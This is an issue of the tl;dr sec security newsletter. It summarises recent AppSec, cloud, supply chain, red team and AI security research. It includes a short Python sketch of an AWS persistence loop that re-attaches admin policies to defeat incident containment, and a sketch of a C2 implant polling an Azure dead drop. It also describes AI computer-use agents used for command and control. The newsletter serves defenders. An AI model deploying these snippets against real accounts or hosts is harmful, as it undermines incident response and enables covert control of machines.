
[tl;dr sec] #324 - OpenAI's GPT-5.4-Cyber, Solve by Default, GitHub Action Security

OpenAI's new cyber-focused model and early access program, how to solve instead of defer tasks, securing GitHub Actions

Hey there,

I hope you’ve been doing well!

🎭️ Backstage Tour

Last weekend one of the primary San Francisco theaters (the Orpheum) had an open house where you could go on the stage, backstage, everywhere. It was awesome 😍 

There was a magical moment of standing on the stage, and then seeing them raise the curtain.

I went downstairs backstage and saw the electronics/lighting room, stood in the pit where the orchestra plays, saw the (surprisingly small) dressing rooms with the mirrors, and more.

Some fun facts I learned:

  • Everything you need to put on a given musical travels with the show in shipping trucks, including all of the set pieces, costumes, props, lighting, etc.

  • For “smaller shows” that are maybe ~7-12 trucks worth, they arrive at a new venue at say 8am, the crew rapidly sets everything up, breaks for dinner at 5pm, then puts on the first show at 7pm that night 🤯 

  • ~60-80% of the behind-the-scenes folks are local to that theater, and they don’t know the show at all on opening night. So there’s a handful of folks traveling with the show who are orchestrating everything so it’s set up properly.

  • The folks on lights have earpieces, and while they’re learning a new show they may just get guidance from the stage manager like, “OK, your next cue: you’re going to pick up, stage right, a man in blue clothing, 50% brightness, these light settings.” But they don’t know which character it is, so at first they’re just kinda guessing.

  • Actors often change in almost pitch darkness (except for some lighting they wear around their head) so the light doesn’t bleed onto the stage.

I also saw a “quick change” demo. Sometimes actors only have a few moments to change, so they did a demo of a <1 minute wardrobe change.

There’s actually a ton of prep and thoughtfulness that goes into orchestrating a quick change: how the pants or dress are “pooled” on the ground so you can just step in, how the boots are positioned so they don’t catch on the clothes, how the top layers are laid down to minimize rotation and movement when putting them on, and how there can be one (or more) wardrobe people helping the actors put everything on. Whoa.

Meanwhile, I put on my own clothes like a plebe.

As you might suspect, cybersecurity is just my bridge career, until I get into the stable, lucrative theater or screen industries 👨‍🎤 

Sponsor

📣 Secure Coding from Design to Deployment

Secure coding starts long before production. 

Modern applications move fast, which means security needs to be built in from the start, not added later. From API design to input handling and access control, early decisions have a big impact on reducing risk.

The Secure Coding Best Practices Cheat Sheet covers key areas like secure design foundations, strong authentication and authorization, input validation, and preventing common vulnerabilities such as XSS, SQL injection, and broken access control.

Reduce risk early with practical secure coding and design best practices.

I love me a good cheat sheet, and I like the focus on secure by design and the most common vulnerability classes 👌 

AppSec

I've Completely Changed How I Work
Friend of the newsletter Scott Behrens, Principal Security Engineer at Netflix, describes how he’s adopted a "solve by default" mindset, using AI coding agents to directly implement solutions rather than filing tickets or waiting on other teams. For example, while playing around with building a user-friendly sandbox, Scott noticed some Go services he was sandboxing didn’t support proxies, so he cloned the repo, had Claude learn the codebase and conventions, built a proxy feature with tests and documentation, and got the PR merged in ~1 hour. This approach extends to security assessments, data analysis, and operational tasks.

  • Turn meetings into tangible products - Scott has an AI notetaker in meetings, which he can then use a prompt to turn that into a PRD which his agents can then start building immediately after the meeting.

  • Turn memos into implementations - “When I think of defaulting to writing something down, or someone shares a strategy doc, problem statement, idea, etc., I immediately ask Claude, ‘Let’s take the relevant part of this and turn it into an implementation.’”

Solve By Default
Follow-up post by Scott Behrens continuing his “solve by default” thread, which he defines as: “when problems emerge that you traditionally wouldn't solve (e.g., execution risks, legacy organizational red tape/paperwork, limited bandwidth), you now solve them with genAI.” Scott shares practical examples including: turning ideas from a meeting into a PRD and having the Superpowers brainstorming plugin help flesh it out then execute, noting and immediately fixing microcuts and nags discovered during pairing sessions, using your agent to turn Slack discussions into GitHub issues to save the ideas, and having agents optimize slow builds, painful runbooks, slow on-call processes, etc.

Scott recommends seeking high-value problems by examining product briefs, incident trends, tech debt backlogs, and gaps between team charters, while avoiding low-impact work by evaluating value, scope, complexity, and leverage before committing time.

I watched all 11 main stage keynotes
Adrian Sanabria watched all 11 RSAC 2026 main stage keynotes (YouTube playlist), lived to tell the tale, and kindly gives us an overview. People generally agreed that AI agents must be secured immediately, but no one has figured out how yet (key challenges: asset discovery, data permissions modeling, output validation, auditability of AI reasoning, compliance, and the integrity problem where agents fabricate data indistinguishably from real retrieval).

Speakers disagreed on fundamental architecture questions like whether agents should be ephemeral (container-like, just-in-time with minimal access) versus long-lived digital co-workers, and whether human-in-the-loop is essential or an unscalable stopgap, though most agreed detection and response must merge into a single automated step given breakout times are sometimes now measured in seconds.

“If you plan on watching these keynotes, don’t base a drinking game on machine speed, agentic, real-time, or human-in-the-loop.”

Sponsor

📣 Cybercrime Just Hit Escape Velocity (Here’s the Evidence)

Flashpoint just released its 2026 Global Threat Intelligence Report, and the data is shocking.

  • AI-related illicit activity surged 1,500% in a single month

  • 3.3B compromised credentials are now fueling identity-based attacks

  • Ransomware incidents increased 53% as groups pivot toward pure-play extortion

The report also explores how threat actors are moving from generative tools to agentic AI frameworks that can automate attacks at scale.

👉 View Report 👈

Whoa, that’s some huge growth. Also, I’m curious to learn more about how threat actors are adopting autonomous agents 😅 

Cloud Security

Fighting Eventual Consistency-Based Persistence - An Analysis of notyet
Sonrai Security's Nigel Sood describes his red-blue collaboration with OFFENSAI’s Eduard Agavriloae on notyet (referenced in last week’s issue), an open-source tool that exploits AWS IAM's eventual consistency propagation window to automatically maintain admin persistence by detecting and reversing containment actions within seconds.

Nigel tested nearly a dozen IR techniques against notyet and found that standard AWS-recommended containment methods, including inline policy deletion/modification, managed policy attachments, permission boundaries, group membership changes, access key deactivation, role deletion, and SSM runbooks like AWSSupport-ContainIAMPrincipal, were all ineffective as notyet detected and reversed them within the consistency window. Only Service Control Policies (SCPs) successfully contained notyet, as member account identities cannot modify SCP attachments even with * permissions.
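
The core trick can be sketched as a simple race: poll the principal’s policies and re-attach admin access the moment a responder removes it, landing the reversal inside the propagation window. The sketch below is a hypothetical simplification for illustration (not notyet’s actual code), using standard boto3 IAM calls; `persistence_loop` requires live AWS credentials to run.

```python
import time

ADMIN_POLICY_ARN = "arn:aws:iam::aws:policy/AdministratorAccess"

def needs_reattach(attached_policy_arns):
    """Pure check: has a responder detached the admin policy?"""
    return ADMIN_POLICY_ARN not in attached_policy_arns

def persistence_loop(iam, user_name, poll_seconds=1):
    """Poll IAM and reverse containment inside the eventual-consistency
    window. `iam` is a boto3 IAM client."""
    while True:
        attached = iam.list_attached_user_policies(UserName=user_name)
        arns = [p["PolicyArn"] for p in attached["AttachedPolicies"]]
        if needs_reattach(arns):
            # The re-attach can land before the detach has finished
            # propagating, so the principal never loses effective access.
            iam.attach_user_policy(UserName=user_name,
                                   PolicyArn=ADMIN_POLICY_ARN)
        time.sleep(poll_seconds)
```

This also makes clear why only SCPs work as containment: they’re enforced at the organization layer, outside anything the compromised principal’s credentials can poll and revert.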

Part 2: AWS CodeBuild (Escalating Privileges via AWS CodeConnections)
Thomas Preece discovered that from an unprivileged AWS CodeBuild job using CodeConnections, you can call an undocumented API to retrieve raw GitHub App tokens or BitBucket JWT App tokens with the full permissions of the installed CodeConnection App. The app generally has read, write and admin permissions on all repos under your organization. See AWS-CodeBuild-HTTP-Intercept-Image for a container image for CodeBuild that allows you to get network monitoring in place before CodeBuild starts your build.

So basically, your CodeConnection setup could mean you’re one breached build job away from having every repo in your organization compromised 😅 AWS is not planning to fix this issue, as they say CodeBuild is a "trusted environment."

💡 Great detailed write-up and walk through of examining how a third party system works internally 👍️ 

Supply Chain

Primer on GitHub Actions Security - Threat Model, Attacks and Defenses
Wiz’s Shay Berkovich describes the GitHub Actions threat model, three main risks (Pull Request pwnage, script injection, 3rd party components), and a defensive playbook.

The post discusses 8 dangerous triggers (including pull_request_target), how script injection occurs when untrusted inputs like branch names or issue titles are directly embedded in bash commands without environment variable binding, and how compromised third-party actions cascade through dependency chains, like when attackers sequentially compromised four Actions to reach Coinbase.

Six Accounts, One Actor: Inside the prt-scan Supply Chain Campaign
Wiz’s Rami McCarthy, Hila Ramati, Scott Piper, and Benjamin Read uncovered six total waves of activity from the same threat actor who was compromising GitHub repos via the pull_request_target workflow trigger. The attacker opened over 500 malicious PRs using AI-generated, language-aware payloads (conftest.py, package.json, build.rs, Makefile injections). Across over 450 analyzed exploit attempts, they observed a <10% overall success rate due to misunderstandings of GitHub's permission model.

“High-value targets including Sentry, OpenSearch, IPFS, NixOS, Jina AI, and recharts all successfully blocked the attack through a combination of first-time contributor approval gates, actor-restricted workflows, and path-based trigger conditions.”

💡 What’s interesting to me here is: 1) the likely use of AI to deliver customized, language-aware payloads. AI is great at writing code, I imagine with the right harness and scaffolding you could create reliable, per-project payloads.

2) 90% of the attacks failed due to misunderstanding GitHub’s permission model. In other words, unforced errors. But the threat actors are rapidly iterating and improving; they won’t make this many mistakes in the future. I’m surprised they didn’t do more testing before attacking more broadly. Unless this is their small scale testing 😅 

Chainguard’s Assemble 2026
Chainguard now has: Libraries (Python, JavaScript, and Java packages built from verified source), Actions (secure-by-default CI/CD workflows), hardened Agent Skills, OS Packages (30,000+ zero-CVE packages for building secure custom images), Commercial Builds (Chainguard’s hardened version of commercial software like GitLab and Elastic).

💡 It’s neat to see how Chainguard took the idea of “let’s just give you 0 CVE containers so you don’t need to worry about it,” built a complex software factory to make it happen, then are now applying that concept to other domains. The product-specific posts share some interesting details about how they do it. I’m bullish on AI-powered hardening at scale, and approaches that solve classes of risks for users. Nice work.

Blue Team

MITRE Fight Fraud Framework
MITRE has released the Fight Fraud Framework™️ (F3), a free, open knowledge base documenting tactics and techniques used by financial fraud actors based on real-world cyber fraud incidents. The framework maps fraud-specific behaviors and references applicable MITRE ATT&CK techniques where relevant, providing a common taxonomy for describing fraud incidents.

YARAHQ/yara-rule-skill
By Florian Roth and Thomas Roccia: An LLM Agent Skill for expert YARA rule authoring, review, and optimization. Embeds industry best practices from the creator of YARA-Forge and yaraQA into your AI assistant's context. It enables natural language rule writing, review, and optimization.

Little Snitch for Linux
Little Snitch for Linux (GitHub) uses eBPF to monitor and control outgoing network connections, providing a web UI that shows which applications are connecting to which servers, with support for custom rules and automatic blocklist updates. The tool can filter by process, port, and protocol, displays traffic history and data volumes, and accepts blocklists in formats like domain-per-line, /etc/hosts, and CIDR ranges.

Red Team

Building Agentic C2 with Computer Use Agents
BeyondTrust’s Ryan Hausknecht describes a proof-of-concept command-and-control (C2) architecture using Claude's computer use capability, where a C# implant on the target endpoint executes AI-driven actions via Windows APIs (SetCursorPos, SendInput) or pyautogui. To avoid direct connections to Anthropic's API, Ryan used Azure Storage blobs as a dead drop for command polling and Azure Function Apps as a proxy to append API keys, ensuring all traffic appears to originate from Azure.

Claude takes screenshots to determine screen resolution and element positioning, then issues click and keypress commands that flow through the function app back to the implant. This architecture keeps API keys off the endpoint and makes network traffic blend in with normal Azure communications.
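
The implant side of a dead-drop design like this reduces to a polling loop: fetch a command blob, dedupe it, execute it. Here’s a minimal Python sketch of that shape; the JSON command format, action names, and function names are my own assumptions for illustration, not taken from the post.

```python
import json

def parse_command(blob_text):
    """Parse a dead-drop command blob into an action the implant
    understands. The format here is hypothetical."""
    cmd = json.loads(blob_text)
    if cmd.get("action") not in {"click", "type", "screenshot"}:
        raise ValueError(f"unknown action: {cmd.get('action')}")
    return cmd

def poll_dead_drop(fetch, execute, seen_ids=None):
    """One polling pass. `fetch` returns the blob body (e.g. an HTTP GET
    against an Azure Storage blob URL), `execute` performs the action
    (e.g. SendInput / pyautogui). Dedupe by command id so an unchanged
    blob isn't replayed every poll."""
    seen_ids = set() if seen_ids is None else seen_ids
    cmd = parse_command(fetch())
    if cmd["id"] not in seen_ids:
        seen_ids.add(cmd["id"])
        execute(cmd)
    return seen_ids
```

Because `fetch` only ever touches the storage blob and the proxying function app, the endpoint never needs the Anthropic API key and its traffic stays Azure-shaped, which is the whole point of the architecture.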

Janus: Listen to Your Logs
SpecterOps's Gavin Kramer introduces Janus, an open-source tool that parses C2 logs from Mythic, Cobalt Strike, and Ghostwriter to surface operational friction like failed commands, retries, and tool failures that typically gets lost when logs are deleted. Janus shows your team where your tooling breaks, where operators lose time, and what you could automate next.

Janus helps red teams understand:

  • Which tools should be updated vs. retired

  • When and why tool failures occur

  • Which techniques are being improvised due to missing capabilities

  • What arguments caused a Beacon object file (BOF) to crash an agent

  • What command ran before a callback stopped checking in

  • What activity later correlated with detection or prevention

“Janus gives leadership the data layer that has been missing, and it answers:”

  • How much time (and therefore cost) is lost to tool failures, retries, and operator workarounds?

  • Which parts of the engagement hold the most variability in timelines and delivery?

  • Where are we paying an “efficiency tax” due to unreliable tooling?
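
At its core this kind of log mining is just tallying failure and retry patterns per tool. A toy sketch of the idea (the tab-separated log format here is invented for illustration; Janus parses real Mythic/Cobalt Strike/Ghostwriter logs):

```python
from collections import Counter

def friction_report(log_lines):
    """Tally failures per tool, and retries (a repeat of a tool right
    after it errored for the same operator) from C2 task log lines of
    the form 'operator<TAB>tool<TAB>status'."""
    failures, retries = Counter(), Counter()
    last_cmd = {}
    for line in log_lines:
        operator, tool, status = line.split("\t")
        if status == "error":
            failures[tool] += 1
        # Running the same tool immediately after it failed reads as a retry.
        if last_cmd.get(operator) == (tool, "error"):
            retries[tool] += 1
        last_cmd[operator] = (tool, status)
    return failures, retries
```

Sort the resulting counters and you have a ranked list of which tools are taxing your operators the most, which is the "efficiency tax" view Janus gives leadership.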

💡 I like this meta idea a lot: collecting logs (or whatever artifact is relevant) from your and your colleagues’ work to automatically surface friction and opportunity for automation. This applies to any area of security, not just red teams.

I feel like this meta idea connects to Scott’s “solve by default” posts at the top: imagine continuously gathering friction points from your security team, developers, or customers and semi-automatically and quickly resolving the paper cuts.

AI + Security

Trusted access for the next era of cyber defense
OpenAI is scaling their Trusted Access for Cyber (TAC) program to thousands of verified defenders and launching GPT-5.4-Cyber, a fine-tuned variant of GPT-5.4 with reduced refusals for cybersecurity tasks and new binary reverse engineering capabilities. OpenAI is using strong Know Your Customer (KYC) and identity verification to limit advanced capabilities to trusted parties, and is giving targeted grants, contributing to open-source security initiatives, and investing in Codex Security to help defenders more rapidly find and patch vulnerabilities.

💡 Perhaps GPT-5.4-Cyber should have been the name for their erotica chatbot 🤔 Jokes aside, it’s great to see OpenAI investing in securing the software ecosystem, supporting defenders, and releasing higher capability models carefully.

The “AI Vulnerability Storm”: Building a “Mythos-ready” Security Program
New ~30 page Cloud Security Alliance whitepaper from Gadi Evron, Rich Mogull, Robert T. Lee, and a long list of other contributors. A briefing for security leaders on how AI-driven vulnerability discovery is reshaping the defender timeline, the operating model of vulnerability management, and the minimum actions required now. Nice overview of recent events and important things to consider for your security program. See:

  • p15 - 10 Questions to Understand Your Security Program State and Influence

  • p16 - A Mythos-ready Security Program Risk Register

  • p19 - Priority Actions for a Mythos-ready Security Program

4x Velocity, 10x Vulnerabilities: AI Coding Assistants Are Shipping More Risks
Apiiro’s Itay Nussbaum shares results from analyzing the impact of AI coding assistants across tens of thousands of repositories in Fortune 50 orgs. They found AI-assisted developers produced 3-4x more commits, but they were packaged into fewer PRs. By June 2025, AI-generated code was introducing over 10,000 new security findings per month across the repos in their study, a 10x spike in just six months compared to December 2024.

Interestingly, the types of flaws introduced by AI are different, for example, privilege escalation paths jumped 322%, and architectural design flaws spiked 153% (I’d like to know more about how these are defined and measured).

💡 Long term I believe coding agents + security orchestration around them will make code more, not less secure, but it’s great to see some stats and investigation on the challenges we’re facing now.

Misc



Politics

  • Cryptocurrency industry bribing, er, donating to politicians

  • Ukraine tips drone war in its favor - “Starting from December, our unmanned systems units have neutralized more enemy personnel than they recruit to their ranks.”

  • How Trump Took the U.S. to War With Iran - Israel’s Netanyahu made the hard sell. The CIA director described the Israeli prime minister’s regime change scenarios as “farcical.” Tucker Carlson warned Trump that a war with Iran would destroy his presidency. “I know you’re worried about it, but it’s going to be OK,” the president said. Mr. Carlson asked how he knew. “Because it always is.”

    • “Everyone deferred to the president’s instincts. They had seen him make bold decisions, take on unfathomable risks and somehow come out on top. No one would impede him now.”

  • Civilization Is Not the Default. Violence Is. - On feudalism, Pax Americana and the changing world order.

  • US ban on Chinese fixed spy cameras led to a rising drone threat - “The rise of drone security incidents corresponds almost exactly to the US 2019 ban on Chinese cameras at American military bases.”

  • Steve Blank - Nowhere is Safe - “The U.S. has discovered that 1) air superiority and missile defense systems designed to counter tens or hundreds of aircraft and missiles is insufficient against asymmetric attacks of thousands of drones. And that 2) undefended high value fixed civilian infrastructure – oil tankers, data centers, desalination plants, oil refineries, energy nodes, factories, et al -are all at risk…the lessons from Iran’s attacks on infrastructure in the Gulf Cooperation Council countries is that anything on the surface is going to be a target.”

✉️ Wrapping Up

Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.

If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏

Thanks for reading!

Cheers,
Clint

P.S. Feel free to connect with me on LinkedIn 👋